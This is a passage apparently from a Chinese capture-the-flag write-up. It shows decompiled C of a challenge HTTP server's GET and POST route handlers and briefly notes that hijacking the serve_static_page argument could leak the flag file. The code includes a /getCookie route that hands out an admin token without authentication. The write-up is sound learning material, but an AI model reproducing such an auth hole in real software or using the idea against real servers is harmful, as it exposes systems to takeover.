<span class="o">*</span><span class="p">)</span><span class="n">s</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v40</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v41</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v42</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v43</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v44</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v45</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v46</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v47</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v48</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v49</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v50</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v51</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v52</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v53</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v54</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v55</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v56</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v57</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v58</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v59</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v60</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v61</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v62</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v63</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v64</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v65</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v66</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v67</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v68</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v69</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v70</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">snprintf</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mh">0x100u</span><span class="p">,</span> <span class="s">&#34;token=%s; Max-Age=0;&#34;</span><span class="p">,</span> <span class="n">g_admin</span><span class="o">-&gt;</span><span class="n">token</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">memset</span><span class="p">(</span><span class="n">g_admin</span><span class="o">-&gt;</span><span class="n">token</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">g_admin</span><span class="o">-&gt;</span><span class="n">token</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="nf">send_redirect</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="s">&#34;/login&#34;</span><span class="p">,</span> <span class="n">s</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v71</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="s">&#34;/resetPasswd&#34;</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">LOBYTE</span><span class="p">(</span><span class="n">v4</span><span class="p">)</span> <span class="o">=</span> <span class="nf">judge_token</span><span class="p">(</span><span class="n">req</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v4</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">serve_static_page</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="s">&#34;reset_passwd.html&#34;</span><span class="p">,</span> <span class="mh">0xC8u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v71</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">goto</span> <span class="n">LABEL_19</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="s">&#34;/config&#34;</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">LOBYTE</span><span class="p">(</span><span class="n">v5</span><span class="p">)</span> <span class="o">=</span> <span class="nf">judge_token</span><span class="p">(</span><span class="n">req</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v5</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">serve_static_page</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="s">&#34;config.html&#34;</span><span class="p">,</span> <span class="mh">0xC8u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v71</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">goto</span> <span class="n">LABEL_19</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="s">&#34;/getCookie&#34;</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">generate_session_token</span><span class="p">((</span><span class="kr">__int64</span><span class="p">)</span><span class="n">g_admin</span><span class="o">-&gt;</span><span class="n">token</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">snprintf</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mh">0x100u</span><span class="p">,</span> <span class="s">&#34;token=%s;&#34;</span><span class="p">,</span> <span class="n">g_admin</span><span class="o">-&gt;</span><span class="n">token</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">send_redirect</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="s">&#34;/login&#34;</span><span class="p">,</span> <span class="n">s</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">serve_static_page</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="s">&#34;404.html&#34;</span><span class="p">,</span> <span class="mh">0x194u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v71</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>全是静态页面,,,没啥用</p> <p>但是 serve_static_page 这个函数有点意思,如果能劫持他的参数,就可以让它回弹目录下的 flag 文件</p> <h4 id="handle_post">handle_post </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="c1">// POST route handler. Supports /login, /resetPasswd, and /config; all non-login actions require a valid token. </span></span></span><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">handle_post</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">request_t</span> <span class="o">*</span><span class="n">req</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// eax </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// eax </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">s1</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span> <span class="c1">// [rsp+50h] [rbp-110h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v6</span><span class="p">;</span> <span class="c1">// [rsp+58h] [rbp-108h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v7</span><span class="p">;</span> <span class="c1">// [rsp+60h] [rbp-100h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v8</span><span class="p">;</span> <span class="c1">// [rsp+68h] [rbp-F8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v9</span><span class="p">;</span> <span class="c1">// [rsp+70h] [rbp-F0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v10</span><span class="p">;</span> <span class="c1">// [rsp+78h] [rbp-E8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v11</span><span class="p">;</span> <span class="c1">// [rsp+80h] [rbp-E0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v12</span><span class="p">;</span> <span class="c1">// [rsp+88h] [rbp-D8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v13</span><span class="p">;</span> <span class="c1">// [rsp+90h] [rbp-D0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v14</span><span class="p">;</span> <span class="c1">// [rsp+98h] [rbp-C8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v15</span><span class="p">;</span> <span class="c1">// [rsp+A0h] [rbp-C0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v16</span><span class="p">;</span> <span class="c1">// [rsp+A8h] [rbp-B8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v17</span><span class="p">;</span> <span class="c1">// [rsp+B0h] [rbp-B0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v18</span><span class="p">;</span> <span class="c1">// [rsp+B8h] [rbp-A8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v19</span><span class="p">;</span> <span class="c1">// [rsp+C0h] [rbp-A0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v20</span><span class="p">;</span> <span class="c1">// [rsp+C8h] [rbp-98h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v21</span><span class="p">;</span> <span class="c1">// [rsp+D0h] [rbp-90h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v22</span><span class="p">;</span> <span class="c1">// [rsp+D8h] [rbp-88h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v23</span><span class="p">;</span> <span class="c1">// [rsp+E0h] [rbp-80h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v24</span><span class="p">;</span> <span class="c1">// [rsp+E8h] [rbp-78h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v25</span><span class="p">;</span> <span class="c1">// [rsp+F0h] [rbp-70h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v26</span><span class="p">;</span> <span class="c1">// [rsp+F8h] [rbp-68h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v27</span><span class="p">;</span> <span class="c1">// [rsp+100h] [rbp-60h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v28</span><span class="p">;</span> <span class="c1">// [rsp+108h] [rbp-58h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v29</span><span class="p">;</span> <span class="c1">// [rsp+110h] [rbp-50h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v30</span><span class="p">;</span> <span class="c1">// [rsp+118h] [rbp-48h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v31</span><span class="p">;</span> <span class="c1">// [rsp+120h] [rbp-40h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v32</span><span class="p">;</span> <span class="c1">// [rsp+128h] [rbp-38h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v33</span><span class="p">;</span> <span class="c1">// [rsp+130h] [rbp-30h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v34</span><span class="p">;</span> <span class="c1">// [rsp+138h] [rbp-28h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v35</span><span class="p">;</span> <span class="c1">// [rsp+140h] [rbp-20h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v36</span><span class="p">;</span> <span class="c1">// [rsp+148h] [rbp-18h] </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v37</span><span class="p">;</span> <span class="c1">// [rsp+158h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v37</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">s1</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v6</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v7</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v8</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v9</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v10</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v11</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v12</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v13</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v14</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v15</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v16</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v17</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v18</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v19</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v20</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v21</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v22</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v23</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v24</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v25</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v26</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v27</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v28</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v29</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v30</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v31</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v32</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v33</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v34</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v35</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v36</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">extract_path_no_query</span><span class="p">(</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">path</span><span class="p">,</span> <span class="n">s1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strncmp</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="s">&#34;/login&#34;</span><span class="p">,</span> <span class="mi">6u</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">judgeuser</span><span class="p">(</span><span class="n">req</span><span class="p">,</span> <span class="n">g_admin</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">send_http_response</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mi">200</span><span class="p">,</span> <span class="s">&#34;application/json&#34;</span><span class="p">,</span> <span class="s">&#34;{</span><span class="se">\&#34;</span><span class="s">authLogin</span><span class="se">\&#34;</span><span class="s"> : 1}&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v37</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="nl">LABEL_16</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">send_http_response</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mi">200</span><span class="p">,</span> <span class="s">&#34;application/json&#34;</span><span class="p">,</span> <span class="s">&#34;{</span><span class="se">\&#34;</span><span class="s">authLogin</span><span class="se">\&#34;</span><span class="s"> : 0}&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v37</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="s">&#34;/resetPasswd&#34;</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">LOBYTE</span><span class="p">(</span><span class="n">v2</span><span class="p">)</span> <span class="o">=</span> <span class="nf">judge_token</span><span class="p">(</span><span class="n">req</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">v2</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">goto</span> <span class="n">LABEL_16</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">reset_password</span><span class="p">(</span><span class="n">req</span><span class="p">,</span> <span class="n">g_admin</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nf">send_http_response</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mi">200</span><span class="p">,</span> <span class="s">&#34;application/json&#34;</span><span class="p">,</span> <span class="s">&#34;{</span><span class="se">\&#34;</span><span class="s">reset</span><span class="se">\&#34;</span><span class="s"> : 1}&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="nf">send_http_response</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mi">200</span><span class="p">,</span> <span class="s">&#34;application/json&#34;</span><span class="p">,</span> <span class="s">&#34;{</span><span class="se">\&#34;</span><span class="s">reset</span><span class="se">\&#34;</span><span class="s"> : 0}&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="nf">strcmp</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="s">&#34;/config&#34;</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">serve_static_page</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="s">&#34;404.html&#34;</span><span class="p">,</span> <span class="mh">0x194u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v37</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">LOBYTE</span><span class="p">(</span><span class="n">v3</span><span class="p">)</span> <span class="o">=</span> <span class="nf">judge_token</span><span class="p">(</span><span class="n">req</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">v3</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">goto</span> <span class="n">LABEL_16</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">set_config</span><span class="p">(</span><span class="n">req</span><span class="p">,</span> <span class="n">g_admin</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nf">send_http_response</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mi">200</span><span class="p">,</span> <span class="s">&#34;application/json&#34;</span><span class="p">,</span> <span class="s">&#34;{</span><span class="se">\&#34;</span><span class="s">setInfo</span><span class="se">\&#34;</span><span class="s"> : 1}&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="nf">send_http_response</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mi">200</span><span class="p">,</span> <span class="s">&#34;application/json&#34;</span><span class="p">,</span> <span class="s">&#34;{</span><span class="se">\&#34;</span><span class="s">setInfo</span><span class="se">\&#34;</span><span class="s"> : 0}&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v37</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> 